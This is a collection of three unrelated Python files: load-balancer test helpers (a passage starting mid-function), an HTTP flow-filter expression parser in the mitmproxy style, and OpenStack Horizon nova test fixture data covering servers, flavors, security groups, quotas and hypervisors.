_add_target(lb, container)
def test_destroy_container(client, context, config_id):
container, lb = _create_lb_and_container(client, context, config_id)
# add target to a load balancer
lb = _add_target(lb, container=container)
_validate_add_target(container, lb, client)
# destroy the instance
# stop the lb instance
container = client.wait_success(container)
if container.state == 'running':
container = client.wait_success(container.stop())
assert container.state == 'stopped'
# remove the lb instance
container = client.wait_success(container.remove())
assert container.state == 'removed'
_validate_remove_target(container, lb, client)
def _resource_is_active(resource):
return resource.state == 'active'
def _resource_is_removed(resource):
return resource.state == 'removed'
def _validate_add_host(host, lb, client):
host_maps = client. \
list_loadBalancerHostMap(loadBalancerId=lb.id,
hostId=host.id)
assert len(host_maps) == 1
host_map = host_maps[0]
wait_for_condition(
client, host_map, _resource_is_active,
lambda x: 'State is: ' + x.state)
assert host_map.hostId == host.id
def _validate_remove_host(host, lb, client):
host_maps = client. \
list_loadBalancerHostMap(loadBalancerId=lb.id,
hostId=host.id)
assert len(host_maps) == 1
host_map = host_maps[0]
wait_for_condition(
client, host_map, _resource_is_removed,
lambda x: 'State is: ' + x.state)
return host_map
def _add_target(lb, container=None, ip_address=None, ports=None):
container_id = container.id if container else None
port_domains = ports if ports else ["99"]
target = {"instanceId": container_id,
"ipAddress": ip_address, "ports": port_domains}
lb = lb.addtarget(loadBalancerTarget=target)
return lb
def _remove_target(lb, container=None, ip_address=None, ports=None):
container_id = container.id if container else None
port_domains = ports if ports else ["99"]
target = {"instanceId": container_id,
"ipAddress": ip_address, "ports": port_domains}
lb = lb.removetarget(loadBalancerTarget=target)
return lb
def _validate_add_target_ip(ip_address, lb, client):
target_maps = client. \
list_loadBalancerTarget(loadBalancerId=lb.id,
ipAddress=ip_address)
assert len(target_maps) == 1
target_map = target_maps[0]
wait_for_condition(
client, target_map, _resource_is_active,
lambda x: 'State is: ' + x.state)
assert target_map.ipAddress == ip_address
def _validate_remove_target_ip(ip_address, lb, client):
target_maps = client. \
list_loadBalancerTarget(loadBalancerId=lb.id,
ipAddress=ip_address)
assert len(target_maps) == 1
target_map = target_maps[0]
wait_for_condition(
client, target_map, _resource_is_removed,
lambda x: 'State is: ' + x.state)
def _validate_add_target(container, lb, client, ports=None):
target_maps = client. \
list_loadBalancerTarget(loadBalancerId=lb.id,
instanceId=container.id)
assert len(target_maps) == 1
target_map = target_maps[0]
wait_for_condition(
client, target_map, _resource_is_active,
lambda x: 'State is: ' + x.state)
if ports:
assert target_map.ports == ports
def _validate_remove_target(container, lb, client):
target_maps = client. \
list_loadBalancerTarget(loadBalancerId=lb.id,
instanceId=container.id)
assert len(target_maps) == 1
target_map = target_maps[0]
wait_for_condition(
client, target_map, _resource_is_removed,
lambda x: 'State is: ' + x.state)
def _create_valid_lb(client, config_id):
test_lb = client. \
create_loadBalancer(name=random_str(),
loadBalancerConfigId=config_id)
test_lb = client.wait_success(test_lb)
return test_lb
def _create_lb_and_container(client, context, config_id):
# create load balancer
lb = _create_valid_lb(client, config_id)
# create a container, no need to start it
container = client.create_container(imageUuid=context.image_uuid,
startOnCreate=False)
container = client.wait_success(container)
return container, lb
def _set_targets(lb, containers=None, ip_addresses=None):
targets = []
for container in containers or []:
target = {"instanceId": container.id, "ports": "100: foo.com"}
targets.append(target)
for ip in ip_addresses or []:
target = {"ipAddress": ip, "ports": "100: bar.com"}
targets.append(target)
lb = lb.settargets(loadBalancerTargets=targets)
return lb
| |
"""
The following operators are understood:
~q Request
~s Response
Headers:
Patterns are matched against "name: value" strings. Field names are
all-lowercase.
~a Asset content-type in response. Asset content types are:
text/javascript
application/x-javascript
application/javascript
text/css
image/*
application/x-shockwave-flash
~h rex Header line in either request or response
~hq rex Header in request
~hs rex Header in response
~b rex Expression in the body of either request or response
~bq rex Expression in the body of request
~bq rex Expression in the body of response
~t rex Shortcut for content-type header.
~d rex Request domain
~m rex Method
~u rex URL
~c CODE Response code.
rex Equivalent to ~u rex
"""
from __future__ import absolute_import
import re, sys
from .contrib import pyparsing as pp
from .protocol.http import decoded
class _Token:
def dump(self, indent=0, fp=sys.stdout):
print >> fp, "\t"*indent, self.__class__.__name__,
if hasattr(self, "expr"):
print >> fp, "(%s)"%self.expr,
print >> fp
class _Action(_Token):
@classmethod
def make(klass, s, loc, toks):
return klass(*toks[1:])
class FErr(_Action):
code = "e"
help = "Match error"
def __call__(self, f):
return True if f.error else False
class FReq(_Action):
code = "q"
help = "Match request with no response"
def __call__(self, f):
if not f.response:
return True
class FResp(_Action):
code = "s"
help = "Match response"
def __call__(self, f):
return True if f.response else False
class _Rex(_Action):
def __init__(self, expr):
self.expr = expr
try:
self.re = re.compile(self.expr)
except:
raise ValueError, "Cannot compile expression."
def _check_content_type(expr, o):
val = o.headers["content-type"]
if val and re.search(expr, val[0]):
return True
return False
class FAsset(_Action):
code = "a"
help = "Match asset in response: CSS, Javascript, Flash, images."
ASSET_TYPES = [
"text/javascript",
"application/x-javascript",
"application/javascript",
"text/css",
"image/.*",
"application/x-shockwave-flash"
]
def __call__(self, f):
if f.response:
for i in self.ASSET_TYPES:
if _check_content_type(i, f.response):
return True
return False
class FContentType(_Rex):
code = "t"
help = "Content-type header"
def __call__(self, f):
if _check_content_type(self.expr, f.request):
return True
elif f.response and _check_content_type(self.expr, f.response):
return True
return False
class FRequestContentType(_Rex):
code = "tq"
help = "Request Content-Type header"
def __call__(self, f):
return _check_content_type(self.expr, f.request)
class FResponseContentType(_Rex):
code = "ts"
help = "Response Content-Type header"
def __call__(self, f):
if f.response:
return _check_content_type(self.expr, f.response)
return False
class FHead(_Rex):
code = "h"
help = "Header"
def __call__(self, f):
if f.request.headers.match_re(self.expr):
return True
elif f.response and f.response.headers.match_re(self.expr):
return True
return False
class FHeadRequest(_Rex):
code = "hq"
help = "Request header"
def __call__(self, f):
if f.request.headers.match_re(self.expr):
return True
class FHeadResponse(_Rex):
code = "hs"
help = "Response header"
def __call__(self, f):
if f.response and f.response.headers.match_re(self.expr):
return True
class FBod(_Rex):
code = "b"
help = "Body"
def __call__(self, f):
if f.request and f.request.content:
with decoded(f.request):
if re.search(self.expr, f.request.content):
return True
if f.response and f.response.content:
with decoded(f.response):
if re.search(self.expr, f.response.content):
return True
return False
class FBodRequest(_Rex):
code = "bq"
help = "Request body"
def __call__(self, f):
if f.request and f.request.content:
with decoded(f.request):
if re.search(self.expr, f.request.content):
return True
class FBodResponse(_Rex):
code = "bs"
help = "Response body"
def __call__(self, f):
if f.response and f.response.content:
with decoded(f.response):
if re.search(self.expr, f.response.content):
return True
class FMethod(_Rex):
code = "m"
help = "Method"
def __call__(self, f):
return bool(re.search(self.expr, f.request.method, re.IGNORECASE))
class FDomain(_Rex):
code = "d"
help = "Domain"
def __call__(self, f):
return bool(re.search(self.expr, f.request.host, re.IGNORECASE))
class FUrl(_Rex):
code = "u"
help = "URL"
# FUrl is special, because it can be "naked".
@classmethod
def make(klass, s, loc, toks):
if len(toks) > 1:
toks = toks[1:]
return klass(*toks)
def __call__(self, f):
return re.search(self.expr, f.request.url)
class _Int(_Action):
def __init__(self, num):
self.num = int(num)
class FCode(_Int):
code = "c"
help = "HTTP response code"
def __call__(self, f):
if f.response and f.response.code == self.num:
return True
class FAnd(_Token):
def __init__(self, lst):
self.lst = lst
def dump(self, indent=0, fp=sys.stdout):
print >> fp, "\t"*indent, self.__class__.__name__
for i in self.lst:
i.dump(indent+1, fp)
def __call__(self, f):
return all(i(f) for i in self.lst)
class FOr(_Token):
def __init__(self, lst):
self.lst = lst
def dump(self, indent=0, fp=sys.stdout):
print >> fp, "\t"*indent, self.__class__.__name__
for i in self.lst:
i.dump(indent+1, fp)
def __call__(self, f):
return any(i(f) for i in self.lst)
class FNot(_Token):
def __init__(self, itm):
self.itm = itm[0]
def dump(self, indent=0, fp=sys.stdout):
print >> fp, "\t"*indent, self.__class__.__name__
self.itm.dump(indent + 1, fp)
def __call__(self, f):
return not self.itm(f)
filt_unary = [
FReq,
FResp,
FAsset,
FErr
]
filt_rex = [
FHeadRequest,
FHeadResponse,
FHead,
FBodRequest,
FBodResponse,
FBod,
FMethod,
FDomain,
FUrl,
FRequestContentType,
FResponseContentType,
FContentType,
]
filt_int = [
FCode
]
def _make():
# Order is important - multi-char expressions need to come before narrow
# ones.
parts = []
for klass in filt_unary:
f = pp.Literal("~%s"%klass.code)
f.setParseAction(klass.make)
parts.append(f)
simplerex = "".join(c for c in pp.printables if c not in "()~'\"")
rex = pp.Word(simplerex) |\
pp.QuotedString("\"", escChar='\\') |\
pp.QuotedString("'", escChar='\\')
for klass in filt_rex:
f = pp.Literal("~%s"%klass.code) + rex.copy()
f.setParseAction(klass.make)
parts.append(f)
for klass in filt_int:
f = pp.Literal("~%s"%klass.code) + pp.Word(pp.nums)
f.setParseAction(klass.make)
parts.append(f)
# A naked rex is a URL rex:
f = rex.copy()
f.setParseAction(FUrl.make)
parts.append(f)
atom = pp.MatchFirst(parts)
expr = pp.operatorPrecedence(
atom,
[
(pp.Literal("!").suppress(), 1, pp.opAssoc.RIGHT, lambda x: FNot(*x)),
(pp.Literal("&").suppress(), 2, pp.opAssoc.LEFT, lambda x: FAnd(*x)),
(pp.Literal("|").suppress(), 2, pp.opAssoc.LEFT, lambda x: FOr(*x)),
]
)
expr = pp.OneOrMore(expr)
return expr.setParseAction(lambda x: FAnd(x) if len(x) != 1 else x)
bnf = _make()
def parse(s):
try:
filt = bnf.parseString(s, parseAll=True)[0]
filt.pattern = s
return filt
except pp.ParseException:
return None
except ValueError:
return None
| |
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import uuid
from novaclient.v2 import aggregates
from novaclient.v2 import availability_zones
from novaclient.v2 import certs
from novaclient.v2 import flavor_access
from novaclient.v2 import flavors
from novaclient.v2 import floating_ips
from novaclient.v2 import hosts
from novaclient.v2 import hypervisors
from novaclient.v2 import keypairs
from novaclient.v2 import quotas
from novaclient.v2 import security_group_rules as rules
from novaclient.v2 import security_groups as sec_groups
from novaclient.v2 import server_groups
from novaclient.v2 import servers
from novaclient.v2 import services
from novaclient.v2 import usage
from novaclient.v2 import volumes
from openstack_dashboard.api import base
from openstack_dashboard.api import nova
from openstack_dashboard.usage import quotas as usage_quotas
from openstack_dashboard.test.test_data import utils
class FlavorExtraSpecs(dict):
def __repr__(self):
return "<FlavorExtraSpecs %s>" % self._info
def __init__(self, info):
super(FlavorExtraSpecs, self).__init__()
self.__dict__.update(info)
self.update(info)
self._info = info
SERVER_DATA = """
{
"server": {
"OS-EXT-SRV-ATTR:instance_name": "instance-00000005",
"OS-EXT-SRV-ATTR:host": "instance-host",
"OS-EXT-STS:task_state": null,
"addresses": {
"private": [
{
"version": 4,
"addr": "10.0.0.1"
}
]
},
"links": [
{
"href": "%(host)s/v1.1/%(tenant_id)s/servers/%(server_id)s",
"rel": "self"
},
{
"href": "%(host)s/%(tenant_id)s/servers/%(server_id)s",
"rel": "bookmark"
}
],
"image": {
"id": "%(image_id)s",
"links": [
{
"href": "%(host)s/%(tenant_id)s/images/%(image_id)s",
"rel": "bookmark"
}
]
},
"OS-EXT-STS:vm_state": "active",
"flavor": {
"id": "%(flavor_id)s",
"links": [
{
"href": "%(host)s/%(tenant_id)s/flavors/%(flavor_id)s",
"rel": "bookmark"
}
]
},
"id": "%(server_id)s",
"user_id": "%(user_id)s",
"OS-DCF:diskConfig": "MANUAL",
"accessIPv4": "",
"accessIPv6": "",
"progress": null,
"OS-EXT-STS:power_state": 1,
"config_drive": "",
"status": "%(status)s",
"updated": "2012-02-28T19:51:27Z",
"hostId": "c461ea283faa0ab5d777073c93b126c68139e4e45934d4fc37e403c2",
"key_name": "%(key_name)s",
"name": "%(name)s",
"created": "2012-02-28T19:51:17Z",
"tenant_id": "%(tenant_id)s",
"metadata": {"someMetaLabel": "someMetaData",
"some<b>html</b>label": "<!--",
"empty": ""}
}
}
"""
USAGE_DATA = """
{
"total_memory_mb_usage": 64246.89777777778,
"total_vcpus_usage": 125.48222222222223,
"total_hours": 125.48222222222223,
"total_local_gb_usage": 0,
"tenant_id": "%(tenant_id)s",
"stop": "2012-01-31T23:59:59.000000",
"start": "2012-01-01T00:00:00.000000",
"server_usages": [
{
"memory_mb": %(flavor_ram)s,
"uptime": 442321,
"started_at": "2012-01-26 20:38:21",
"ended_at": null,
"name": "%(instance_name)s",
"tenant_id": "%(tenant_id)s",
"state": "active",
"hours": 122.87361111111112,
"vcpus": %(flavor_vcpus)s,
"flavor": "%(flavor_name)s",
"local_gb": %(flavor_disk)s
},
{
"memory_mb": %(flavor_ram)s,
"uptime": 9367,
"started_at": "2012-01-31 20:54:15",
"ended_at": null,
"name": "%(instance_name)s",
"tenant_id": "%(tenant_id)s",
"state": "active",
"hours": 2.608611111111111,
"vcpus": %(flavor_vcpus)s,
"flavor": "%(flavor_name)s",
"local_gb": %(flavor_disk)s
}
]
}
"""
def data(TEST):
TEST.servers = utils.TestDataContainer()
TEST.flavors = utils.TestDataContainer()
TEST.flavor_access = utils.TestDataContainer()
TEST.keypairs = utils.TestDataContainer()
TEST.security_groups = utils.TestDataContainer()
TEST.security_groups_uuid = utils.TestDataContainer()
TEST.security_group_rules = utils.TestDataContainer()
TEST.security_group_rules_uuid = utils.TestDataContainer()
TEST.volumes = utils.TestDataContainer()
TEST.quotas = utils.TestDataContainer()
TEST.quota_usages = utils.TestDataContainer()
TEST.disabled_quotas = utils.TestDataContainer()
TEST.floating_ips = utils.TestDataContainer()
TEST.floating_ips_uuid = utils.TestDataContainer()
TEST.usages = utils.TestDataContainer()
TEST.certs = utils.TestDataContainer()
TEST.availability_zones = utils.TestDataContainer()
TEST.hypervisors = utils.TestDataContainer()
TEST.services = utils.TestDataContainer()
TEST.aggregates = utils.TestDataContainer()
TEST.hosts = utils.TestDataContainer()
TEST.server_groups = utils.TestDataContainer()
# Data return by novaclient.
# It is used if API layer does data conversion.
TEST.api_floating_ips = utils.TestDataContainer()
TEST.api_floating_ips_uuid = utils.TestDataContainer()
# Volumes
volume = volumes.Volume(
volumes.VolumeManager(None),
{"id": "41023e92-8008-4c8b-8059-7f2293ff3775",
"name": 'test_volume',
"status": 'available',
"size": 40,
"display_name": 'Volume name',
"created_at": '2012-04-01 10:30:00',
"volume_type": None,
"attachments": []})
nameless_volume = volumes.Volume(
volumes.VolumeManager(None),
{"id": "3b189ac8-9166-ac7f-90c9-16c8bf9e01ac",
"name": '',
"status": 'in-use',
"size": 10,
"display_name": '',
"display_description": '',
"device": "/dev/hda",
"created_at": '2010-11-21 18:34:25',
"volume_type": 'vol_type_1',
"attachments": [{"id": "1", "server_id": '1',
"device": "/dev/hda"}]})
attached_volume = volumes.Volume(
volumes.VolumeManager(None),
{"id": "8cba67c1-2741-6c79-5ab6-9c2bf8c96ab0",
"name": 'my_volume',
"status": 'in-use',
"size": 30,
"display_name": 'My Volume',
"display_description": '',
"device": "/dev/hdk",
"created_at": '2011-05-01 11:54:33',
"volume_type": 'vol_type_2',
"attachments": [{"id": "2", "server_id": '1',
"device": "/dev/hdk"}]})
non_bootable_volume = volumes.Volume(
volumes.VolumeManager(None),
{"id": "41023e92-8008-4c8b-8059-7f2293ff3771",
"name": 'non_bootable_volume',
"status": 'available',
"size": 40,
"display_name": 'Non Bootable Volume',
"created_at": '2012-04-01 10:30:00',
"volume_type": None,
"attachments": []})
volume.bootable = 'true'
nameless_volume.bootable = 'true'
attached_volume.bootable = 'true'
non_bootable_volume.bootable = 'false'
TEST.volumes.add(volume)
TEST.volumes.add(nameless_volume)
TEST.volumes.add(attached_volume)
TEST.volumes.add(non_bootable_volume)
# Flavors
flavor_1 = flavors.Flavor(flavors.FlavorManager(None),
{'id': "aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa",
'name': 'm1.tiny',
'vcpus': 1,
'disk': 0,
'ram': 512,
'swap': 0,
'rxtx_factor': 1,
'extra_specs': {},
'os-flavor-access:is_public': True,
'OS-FLV-EXT-DATA:ephemeral': 0})
flavor_2 = flavors.Flavor(flavors.FlavorManager(None),
{'id': "bbbbbbbb-bbbb-bbbb-bbbb-bbbbbbbbbbbb",
'name': 'm1.massive',
'vcpus': 1000,
'disk': 1024,
'ram': 10000,
'swap': 0,
'rxtx_factor': 1,
'extra_specs': {'Trusted': True, 'foo': 'bar'},
'os-flavor-access:is_public': True,
'OS-FLV-EXT-DATA:ephemeral': 2048})
flavor_3 = flavors.Flavor(flavors.FlavorManager(None),
{'id': "dddddddd-dddd-dddd-dddd-dddddddddddd",
'name': 'm1.secret',
'vcpus': 1000,
'disk': 1024,
'ram': 10000,
'swap': 0,
'rxtx_factor': 1,
'extra_specs': {},
'os-flavor-access:is_public': False,
'OS-FLV-EXT-DATA:ephemeral': 2048})
flavor_4 = flavors.Flavor(flavors.FlavorManager(None),
{'id': "eeeeeeee-eeee-eeee-eeee-eeeeeeeeeeee",
'name': 'm1.metadata',
'vcpus': 1000,
'disk': 1024,
'ram': 10000,
'swap': 0,
'rxtx_factor': 1,
'extra_specs': FlavorExtraSpecs(
{'key': 'key_mock',
'value': 'value_mock'}),
'os-flavor-access:is_public': False,
'OS-FLV-EXT-DATA:ephemeral': 2048})
TEST.flavors.add(flavor_1, flavor_2, flavor_3, flavor_4)
flavor_access_manager = flavor_access.FlavorAccessManager(None)
flavor_access_1 = flavor_access.FlavorAccess(
flavor_access_manager,
{"tenant_id": "1",
"flavor_id": "dddddddd-dddd-dddd-dddd-dddddddddddd"})
flavor_access_2 = flavor_access.FlavorAccess(
flavor_access_manager,
{"tenant_id": "2",
"flavor_id": "dddddddd-dddd-dddd-dddd-dddddddddddd"})
TEST.flavor_access.add(flavor_access_1, flavor_access_2)
# Key pairs
keypair = keypairs.Keypair(keypairs.KeypairManager(None),
dict(name='keyName'))
TEST.keypairs.add(keypair)
# Security Groups and Rules
def generate_security_groups(is_uuid=False):
def get_id(is_uuid):
global current_int_id
if is_uuid:
return str(uuid.uuid4())
else:
get_id.current_int_id += 1
return get_id.current_int_id
get_id.current_int_id = 0
sg_manager = sec_groups.SecurityGroupManager(None)
rule_manager = rules.SecurityGroupRuleManager(None)
sec_group_1 = sec_groups.SecurityGroup(sg_manager,
{"rules": [],
"tenant_id": TEST.tenant.id,
"id": get_id(is_uuid),
"name": u"default",
"description": u"default"})
sec_group_2 = sec_groups.SecurityGroup(sg_manager,
{"rules": [],
"tenant_id": TEST.tenant.id,
"id": get_id(is_uuid),
"name": u"other_group",
"description": u"NotDefault."})
sec_group_3 = sec_groups.SecurityGroup(sg_manager,
{"rules": [],
"tenant_id": TEST.tenant.id,
"id": get_id(is_uuid),
"name": u"another_group",
"description": u"NotDefault."})
rule = {'id': get_id(is_uuid),
'group': {},
'ip_protocol': u"tcp",
'from_port': u"80",
'to_port': u"80",
'parent_group_id': sec_group_1.id,
'ip_range': {'cidr': u"0.0.0.0/32"}}
icmp_rule = {'id': get_id(is_uuid),
'group': {},
'ip_protocol': u"icmp",
'from_port': u"9",
'to_port': u"5",
'parent_group_id': sec_group_1.id,
'ip_range': {'cidr': u"0.0.0.0/32"}}
group_rule = {'id': 3,
'group': {},
'ip_protocol': u"tcp",
'from_port': u"80",
'to_port': u"80",
'parent_group_id': sec_group_1.id,
'source_group_id': sec_group_1.id}
rule_obj = rules.SecurityGroupRule(rule_manager, rule)
rule_obj2 = rules.SecurityGroupRule(rule_manager, icmp_rule)
rule_obj3 = rules.SecurityGroupRule(rule_manager, group_rule)
sec_group_1.rules = [rule_obj]
sec_group_2.rules = [rule_obj]
return {"rules": [rule_obj, rule_obj2, rule_obj3],
"groups": [sec_group_1, sec_group_2, sec_group_3]}
sg_data = generate_security_groups()
TEST.security_group_rules.add(*sg_data["rules"])
TEST.security_groups.add(*sg_data["groups"])
sg_uuid_data = generate_security_groups(is_uuid=True)
TEST.security_group_rules_uuid.add(*sg_uuid_data["rules"])
TEST.security_groups_uuid.add(*sg_uuid_data["groups"])
# Quota Sets
quota_data = dict(metadata_items='1',
injected_file_content_bytes='1',
ram=10000,
floating_ips='1',
fixed_ips='10',
instances='10',
injected_files='1',
cores='10',
security_groups='10',
security_group_rules='20')
quota = quotas.QuotaSet(quotas.QuotaSetManager(None), quota_data)
TEST.quotas.nova = base.QuotaSet(quota)
TEST.quotas.add(base.QuotaSet(quota))
# nova quotas disabled when neutron is enabled
disabled_quotas_nova = ['floating_ips', 'fixed_ips',
'security_groups', 'security_group_rules']
TEST.disabled_quotas.add(disabled_quotas_nova)
# Quota Usages
quota_usage_data = {'gigabytes': {'used': 0,
'quota': 1000},
'instances': {'used': 0,
'quota': 10},
'ram': {'used': 0,
'quota': 10000},
'cores': {'used': 0,
'quota': 20},
'floating_ips': {'used': 0,
'quota': 10},
'security_groups': {'used': 0,
'quota': 10},
'volumes': {'used': 0,
'quota': 10}}
quota_usage = usage_quotas.QuotaUsage()
for k, v in quota_usage_data.items():
quota_usage.add_quota(base.Quota(k, v['quota']))
quota_usage.tally(k, v['used'])
TEST.quota_usages.add(quota_usage)
# Limits
limits = {"absolute": {"maxImageMeta": 128,
"maxPersonality": 5,
"maxPersonalitySize": 10240,
"maxSecurityGroupRules": 20,
"maxSecurityGroups": 10,
"maxServerMeta": 128,
"maxTotalCores": 20,
"maxTotalFloatingIps": 10,
"maxTotalInstances": 10,
"maxTotalKeypairs": 100,
"maxTotalRAMSize": 10000,
"totalCoresUsed": 0,
"totalInstancesUsed": 0,
"totalKeyPairsUsed": 0,
"totalRAMUsed": 0,
"totalSecurityGroupsUsed": 0}}
TEST.limits = limits
# Servers
tenant3 = TEST.tenants.list()[2]
vals = {"host": "http://nova.example.com:8774",
"name": "server_1",
"status": "ACTIVE",
"tenant_id": TEST.tenants.first().id,
"user_id": TEST.user.id,
"server_id": "1",
"flavor_id": flavor_1.id,
"image_id": TEST.images.first().id,
"key_name": keypair.name}
server_1 = servers.Server(servers.ServerManager(None),
json.loads(SERVER_DATA % vals)['server'])
vals.update({"name": "server_2",
"status": "BUILD",
"server_id": "2"})
server_2 = servers.Server(servers.ServerManager(None),
json.loads(SERVER_DATA % vals)['server'])
vals.update({"name": u'\u4e91\u89c4\u5219',
"status": "ACTIVE",
"tenant_id": tenant3.id,
"server_id": "3"})
server_3 = servers.Server(servers.ServerManager(None),
json.loads(SERVER_DATA % vals)['server'])
vals.update({"name": "server_4",
"status": "PAUSED",
"server_id": "4"})
server_4 = servers.Server(servers.ServerManager(None),
json.loads(SERVER_DATA % vals)['server'])
TEST.servers.add(server_1, server_2, server_3, server_4)
# VNC Console Data
console = {u'console': {u'url': u'http://example.com:6080/vnc_auto.html',
u'type': u'novnc'}}
TEST.servers.vnc_console_data = console
# SPICE Console Data
console = {u'console': {u'url': u'http://example.com:6080/spice_auto.html',
u'type': u'spice'}}
TEST.servers.spice_console_data = console
# RDP Console Data
console = {u'console': {u'url': u'http://example.com:6080/rdp_auto.html',
u'type': u'rdp'}}
TEST.servers.rdp_console_data = console
# Floating IPs
def generate_fip(conf):
return floating_ips.FloatingIP(floating_ips.FloatingIPManager(None),
conf)
fip_1 = {'id': 1,
'fixed_ip': '10.0.0.4',
'instance_id': server_1.id,
'ip': '58.58.58.58',
'pool': 'pool1'}
fip_2 = {'id': 2,
'fixed_ip': None,
'instance_id': None,
'ip': '58.58.58.58',
'pool': 'pool2'}
# this floating ip is for lbaas tests
fip_3 = {'id': 3,
'fixed_ip': '10.0.0.5',
# the underlying class maps the instance id to port id
'instance_id': '063cf7f3-ded1-4297-bc4c-31eae876cc91',
'ip': '58.58.58.58',
'pool': 'pool2'}
TEST.api_floating_ips.add(generate_fip(fip_1), generate_fip(fip_2),
generate_fip(fip_3))
TEST.floating_ips.add(nova.FloatingIp(generate_fip(fip_1)),
nova.FloatingIp(generate_fip(fip_2)),
nova.FloatingIp(generate_fip(fip_3)))
# Floating IP with UUID id (for Floating IP with Neutron Proxy)
fip_3 = {'id': str(uuid.uuid4()),
'fixed_ip': '10.0.0.4',
'instance_id': server_1.id,
'ip': '58.58.58.58',
'pool': 'pool1'}
fip_4 = {'id': str(uuid.uuid4()),
'fixed_ip': None,
'instance_id': None,
'ip': '58.58.58.58',
'pool': 'pool2'}
TEST.api_floating_ips_uuid.add(generate_fip(fip_3), generate_fip(fip_4))
TEST.floating_ips_uuid.add(nova.FloatingIp(generate_fip(fip_3)),
nova.FloatingIp(generate_fip(fip_4)))
# Usage
usage_vals = {"tenant_id": TEST.tenant.id,
"instance_name": server_1.name,
"flavor_name": flavor_1.name,
"flavor_vcpus": flavor_1.vcpus,
"flavor_disk": flavor_1.disk,
"flavor_ram": flavor_1.ram}
usage_obj = usage.Usage(usage.UsageManager(None),
json.loads(USAGE_DATA % usage_vals))
TEST.usages.add(usage_obj)
usage_2_vals = {"tenant_id": tenant3.id,
"instance_name": server_3.name,
"flavor_name": flavor_1.name,
"flavor_vcpus": flavor_1.vcpus,
"flavor_disk": flavor_1.disk,
"flavor_ram": flavor_1.ram}
usage_obj_2 = usage.Usage(usage.UsageManager(None),
json.loads(USAGE_DATA % usage_2_vals))
TEST.usages.add(usage_obj_2)
cert_data = {'private_key': 'private',
'data': 'certificate_data'}
certificate = certs.Certificate(certs.CertificateManager(None), cert_data)
TEST.certs.add(certificate)
# Availability Zones
TEST.availability_zones.add(availability_zones.AvailabilityZone(
availability_zones.AvailabilityZoneManager(None),
{
'zoneName': 'nova',
'zoneState': {'available': True},
'hosts': {
"host001": {
"nova-network": {
"active": True,
"available": True,
},
},
},
},
))
# hypervisors
hypervisor_1 = hypervisors.Hypervisor(
hypervisors.HypervisorManager(None),
{
"service": {"host": "devstack001", "id": 3},
"vcpus_used": 1,
"hypervisor_type": "QEMU",
"local_gb_used": 20,
"hypervisor_hostname": "devstack001",
"memory_mb_used": 1500,
"memory_mb": 2000,
"current_workload": 0,
"vcpus": 1,
"cpu_info": '{"vendor": "Intel", "model": "core2duo",'
'"arch": "x86_64", "features": ["lahf_lm"'
', "rdtscp"], "topology": {"cores": 1, "t'
'hreads": 1, "sockets": 1}}',
"running_vms": 1,
"free_disk_gb": 9,
"hypervisor_version": 1002000,
"disk_available_least": 6,
"local_gb": 29,
"free_ram_mb": 500,
"id": 1,
"servers": [{"name": "test_name", "uuid": "test_uuid"}]
},
)
hypervisor_2 = hypervisors.Hypervisor(
hypervisors.HypervisorManager(None),
{
"service": {"host": "devstack002", "id": 4},
"vcpus_used": 1,
"hypervisor_type": "QEMU",
"local_gb_used": 20,
"hypervisor_hostname": "devstack001",
"memory_mb_used": 1500,
"memory_mb": 2000,
"current_workload": 0,
"vcpus": 1,
"cpu_info": '{"vendor": "Intel", "model": "core2duo",'
'"arch": "x86_64", "features": ["lahf_lm"'
', "rdtscp"], "topology": {"cores": 1, "t'
'hreads": 1, "sockets": 1}}',
"running_vms": 1,
"free_disk_gb": 9,
"hypervisor_version": 1002000,
"disk_available_least": 6,
"local_gb": 29,
"free_ram_mb": 500,
"id": 2,
"servers": [{"name": "test_name_2", "uuid": "test_uuid_2"}]
},
)
hypervisor_3 = hypervisors.Hypervisor(
hypervisors.HypervisorManager(None),
{
"service": {"host": "instance-host", "id": 5},
"vcpus_used": 1,
"hypervisor_type": "QEMU",
"local_gb_used": 20,
"hypervisor_hostname": "devstack003",
"memory_mb_used": 1500,
"memory_mb": 2000,
"current_workload": 0,
"vcpus": 1,
"cpu_info": '{"vendor": "Intel", "model": "core2duo",'
'"arch": "x86_64", "features": ["lahf_lm"'
', "rdtscp"], "topology": {"cores": 1, "t'
'hreads": 1, "sockets": 1}}',
"running_vms": 1,
"free_disk_gb": 9,
"hypervisor_version": 1002000,
"disk_available_least": 6,
"local_gb": 29,
"free_ram_mb": 500,
"id": 3,
},
)
TEST.hypervisors.add(hypervisor_1)
TEST.hypervisors.add(hypervisor_2)
TEST.hypervisors.add(hypervisor_3)
TEST.hypervisors.stats = {
"hypervisor_statistics": {
"count": 5,
"vcpus_used": 3,
"local_gb_used": 15,
"memory_mb": 483310,
"current_workload": 0,
"vcpus": 160,
"running_vms": 3,
"free_disk_gb": 12548,
"disk_available_least": 12556,
"local_gb": 12563,
"free_ram_mb": 428014,
"memory_mb_used": 55296,
}
}
# Services
service_1 = services.Service(services.ServiceManager(None), {
"status": "enabled",
"binary": "nova-conductor",
"zone": "internal",
"state": "up",
"updated_at": "2013-07-08T05:21:00.000000",
"host": "devstack001",
"disabled_reason": None,
})
service_2 = services.Service(services.ServiceManager(None), {
"status": "enabled",
"binary": "nova-compute",
"zone": "nova",
"state": "up",
"updated_at": "2013-07-08T05:20:51.000000",
"host": "devstack001",
"disabled_reason": None,
})
service_3 = services.Service(services.ServiceManager(None), {
"status": "enabled",
"binary": "nova-compute",
"zone": "nova",
"state": "down",
"updated_at": "2013-07-08T04:20:51.000000",
"host": "devstack002",
"disabled_reason": None,
})
service_4 = services.Service(services.ServiceManager(None), {
"status": "disabled",
"binary": "nova-compute",
"zone": "nova",
"state": "up",
"updated_at": "2013-07-08T04:20:51.000000",
"host": "devstack003",
"disabled_reason": None,
})
TEST.services.add(service_1)
TEST.services.add(service_2)
TEST.services.add(service_3)
TEST.services.add(service_4)
# Aggregates
aggregate_1 = aggregates.Aggregate(aggregates.AggregateManager(None), {
"name": "foo",
"availability_zone": "testing",
"deleted": 0,
"created_at": "2013-07-04T13:34:38.000000",
"updated_at": None,
"hosts": ["foo", "bar"],
"deleted_at": None,
"id": 1,
"metadata": {"foo": "testing", "bar": "testing"},
})
